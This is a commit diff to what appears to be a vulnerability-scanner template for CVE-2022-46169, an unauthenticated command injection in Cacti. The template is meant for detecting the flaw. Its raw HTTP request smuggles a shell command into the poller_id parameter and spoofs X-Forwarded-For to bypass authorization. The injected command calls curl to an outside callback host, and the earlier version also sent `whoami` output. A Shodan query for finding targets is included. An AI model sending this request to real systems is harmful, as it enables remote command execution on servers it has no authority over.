Update CVE-2022-46169.yaml

patch-1
Prince Chaddha 2023-03-31 15:49:24 +05:30 committed by GitHub
parent d8070a75be
commit 53ccf5283b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 5 additions and 5 deletions

View File

@ -2,7 +2,7 @@ id: CVE-2022-46169
info:
name: Cacti <= 1.2.22 - Unauthenticated Command Injection
author: Hardik-Solanki
author: Hardik-Solanki,j4vaovo
severity: critical
description: |
The vulnerability allows a remote attacker to compromise the affected system. The vulnerability exists due to insufficient authorization within the Remote Agent when handling HTTP requests with a custom Forwarded-For HTTP header. A remote non-authenticated attacker can send a specially crafted HTTP request to the affected instance and execute arbitrary OS commands on the server.
@ -18,8 +18,8 @@ info:
cwe-id: CWE-285
metadata:
shodan-query: title:"Login to Cacti"
verified: "true"
tags: cve2022,cve,auth-bypass,cacti,kev,rce,unauth
verified: true
tags: cve,cve2022,auth-bypass,cacti,kev,rce,unauth
variables:
useragent: '{{rand_base(6)}}'
@ -27,7 +27,7 @@ variables:
requests:
- raw:
- |
GET /remote_agent.php?action=polldata&local_data_ids[0]=1&host_id=1&poller_id=;curl%20{{interactsh-url}}/`whoami`; HTTP/1.1
GET /remote_agent.php?action=polldata&local_data_ids[0]=1&host_id=1&poller_id=;curl%20{{interactsh-url}}%20-H%20'User-Agent%3a%20{{useragent}}'; HTTP/1.1
Host: {{Hostname}}
X-Forwarded-For: 127.0.0.1